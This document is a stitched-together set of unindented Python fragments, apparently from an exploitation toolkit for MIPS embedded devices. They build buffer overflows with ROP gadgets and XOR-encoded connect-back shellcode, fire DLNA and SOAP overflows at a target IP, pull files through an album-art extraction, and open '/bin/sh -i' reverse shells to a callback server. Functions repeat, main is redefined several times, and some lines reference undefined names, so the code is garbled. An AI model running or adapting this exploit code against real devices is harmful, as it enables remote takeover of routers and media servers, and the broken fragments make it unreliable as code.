def main(command):
logger=Logging()
logger.LOG_INFO("Bulding overflow.")
buf=build_overflow(logger)
if command.startswith("find="):
find_string=command.split("find=")[1]
offset=find_offset(buf,find_string)
logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
sys.exit(0)
logger.LOG_INFO("Starting server.")
server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger)
pid=server.serve()
target_ip=command
if pid:
try:
send_overflow(buf,target_ip,logger)
server.wait()
except Exception as e:
print e
server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-back server.")
sys.exit(1)
logger.LOG_INFO("Done.")
def do_overflow(callback_ip,target):
Logging().LOG_INFO("doing overflow")
connectback_server=ConnectbackServer(callback_ip,startcmd="/bin/sh -i")
pid=connectback_server.serve()
time.sleep(1)
if pid:
try:
SoapSqlInjection(target,connectback_ip=callback_ip,action="overflow")
connectback_server.wait()
except Exception as e:
print e
Logging().LOG_WARN("Failed to connect. Killing connect-back server.")
connectback_server.shutdown()
raise e
else:
Logging().LOG_WARN("Failed to start connect-back server.")
def do_overflow(callback_ip,target):
Logging().LOG_INFO("doing overflow")
connectback_server=ConnectbackServer(callback_ip,startcmd="/bin/sh -i")
pid=connectback_server.serve()
time.sleep(1)
if pid:
try:
SoapSqlInjection(target,connectback_ip=callback_ip,action="overflow")
connectback_server.wait()
except Exception as e:
print e
Logging().LOG_WARN("Failed to connect. Killing connect-back server.")
connectback_server.shutdown()
raise e
else:
Logging().LOG_WARN("Failed to start connect-back server.")
def __init__(self,
callback_ip_address,
port,
target_ip_address,
logger=None):
self.logger = logger
if port:
self.port = port
else:
self.port = 8080
self.target_ip_address = target_ip_address
self.callback_ip_address = callback_ip_address
self.offset_modifier = len(target_ip_address)
if not self.logger:
self.logger = Logging()
#"/usr/sbin/telnetd -p 31337"
#"/bin/sh -i"
self.connectback_server = ConnectbackServer(callback_ip_address,
port=port,
startcmd="/bin/sh -i")
self.endianness = self.__class__.endianness
self.overflow_len = self.__class__.overflow_len
#locate stack. add 0x48+var_30+$sp into $s5, jalr $s6
################################################################################
section=SC.gadget_section(240,
0x328F4,
description="add offset from $sp into s5, jalr $s6")
################################################################################
#jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg
################################################################################
section=SC.gadget_section(192,
0x1B1F4,
description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.")
connectback_server=ConnectbackServer(CALLBACK_IP,port=8080,startcmd="/bin/sh -i",connectback_shell=True)
payload=ConnectbackPayload(CALLBACK_IP,BigEndian,port=8080)
encoded_payload=MipsXorEncoder(payload,badchars=['\0'])
SC.string_section(268,encoded_payload.shellcode,
description="connect back payload")
buffer_overflow_string=OverflowBuffer(BigEndian,576,SC.section_list)
pretty_msearch=msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string())
print "\n\n"+str(pretty_msearch)+"\n\n"
def main(options, logger=None):
outfile = None
path = None
connectback_ip = None
port = None
host = None
if not logger:
logger = Logging()
try:
port = options["port"]
except KeyError:
port = 8200
try:
connectback_ip = options["connectback_ip"]
except KeyError:
pass
try:
host = options["target"]
except KeyError:
pass
try:
path = options["extract"]
except KeyError:
pass
if path:
try:
outfile = options["outfile"]
host = options["target"]
logger.LOG_DEBUG("main() got path=%s" % path)
albumart_extract(host, path, outfile=outfile, logger=logger)
exit(0)
except KeyError:
print(
"File extraction requires a remote path, local file, and target IP address."
)
usage(1)
if connectback_ip:
buf = DLNA_Overflow(1536, connectback_ip, logger=logger).buf
try:
find_str = options["find_string"]
logger.LOG_INFO("Finding offset of %s" % find_str)
find = find_str
if find_str.startswith("0x"):
find = int(find_str, 16)
offset = buf.find_offset(find)
logger.LOG_INFO("Offset: %s" % offset)
exit(0)
except KeyError:
pass
if not host:
print("Remote exploitation requires a target IP address.")
usage(1)
else:
print(
"No file extraction, overflow search string, or remote target was provided."
)
usage(1)
if not do_verification(host, port=port, logger=logger):
exit(1)
server = ConnectbackServer(connectback_ip, startcmd="/bin/sh -i")
server.serve()
try:
do_overflow(host, buf, port=port, logger=logger)
except Exception as e:
server.shutdown()
raise e
server.wait()
def main(options):
logger=Logging()
logger.LOG_INFO("Bulding overflow.")
connectback_ip=options["connectback_ip"]
buf=build_overflow(connectback_ip,logger=logger)
if options.has_key("overflow_file"):
logger.LOG_INFO("Writing overflow string to file: %s" % options["overflow_file"])
open(options["overflow_file"],"wb").write(str(buf))
if options.has_key("find_string"):
find_string=options["find_string"]
offset=find_offset(buf,find_string)
logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
sys.exit(0)
logger.LOG_INFO("Starting server.")
try:
server=ConnectbackServer(connectback_ip,port=8080,logger=logger)
pid=server.serve()
except Exception as e:
logger.LOG_WARN("Failed to start connect-back server: %s" % str(e))
sys.exit(1)
if options.has_key("target"):
target_ip=options["target"]
target_ip=command
try:
send_overflow(buf,target_ip,logger)
server.wait()
except Exception as e:
print e
server.shutdown()
else:
try:
server.wait()
except:
server.shutdown()
logger.LOG_INFO("Done.")
search_string = sys.argv[1]
if search_string.startswith("0x"):
search_value = int(search_string, 16)
else:
search_value = search_string
offset = buf.find_offset(search_value)
if (offset < 0):
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string, offset)
exit(0)
addr = sys.argv[1]
port = int(sys.argv[2])
connectback_server = ConnectbackServer(CALLBACK_IP, startcmd="/bin/sh -i")
#Or non-interactive exploitation:
#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)
pid = connectback_server.serve()
time.sleep(1)
if pid:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((addr, port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
connectback_server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
def main(options,logger=None):
outfile=None
path=None
connectback_ip=None
port=None
host=None
if not logger:
logger=Logging()
try:
port=options["port"]
except KeyError:
port=8200
try:
connectback_ip=options["connectback_ip"]
except KeyError:
pass
try:
host=options["target"]
except KeyError:
pass
try:
path=options["extract"]
except KeyError:
pass
if path:
try:
outfile=options["outfile"]
host=options["target"]
# logger.LOG_DEBUG("main() got path=%s" % path)
albumart_extract(host,path,outfile=outfile,logger=logger)
exit(0)
except KeyError:
print("File extraction requires a remote path, local file, and target IP address.")
usage(1)
if connectback_ip:
try:
logger.set_max_log_level(Logging.INFO)
buf=DLNA_Overflow(1536,connectback_ip,logger=logger).buf
logger.set_max_log_level(Logging.DEBUG)
except DLNAOverflowException as e:
logger.LOG_WARN("%s" % str(e))
exit(1)
try:
find_str=options["find_string"]
logger.LOG_INFO("Finding offset of %s" % find_str)
find=find_str
if find_str.startswith("0x"):
find=int(find_str,16)
offset=buf.find_offset(find)
logger.LOG_INFO("Offset: %s" % offset)
exit(0)
except KeyError:
pass
if not host:
print("Remote exploitation requires a target IP address.")
usage(1)
else:
print("No file extraction, overflow search string, or remote target was provided.")
usage(1)
if not do_verification(host,port=port,logger=logger):
exit(1)
server=ConnectbackServer(connectback_ip,startcmd="/bin/sh -i")
server.serve()
try:
do_overflow(host,buf,port=port,logger=logger)
except Exception as e:
server.shutdown()
raise e
server.wait()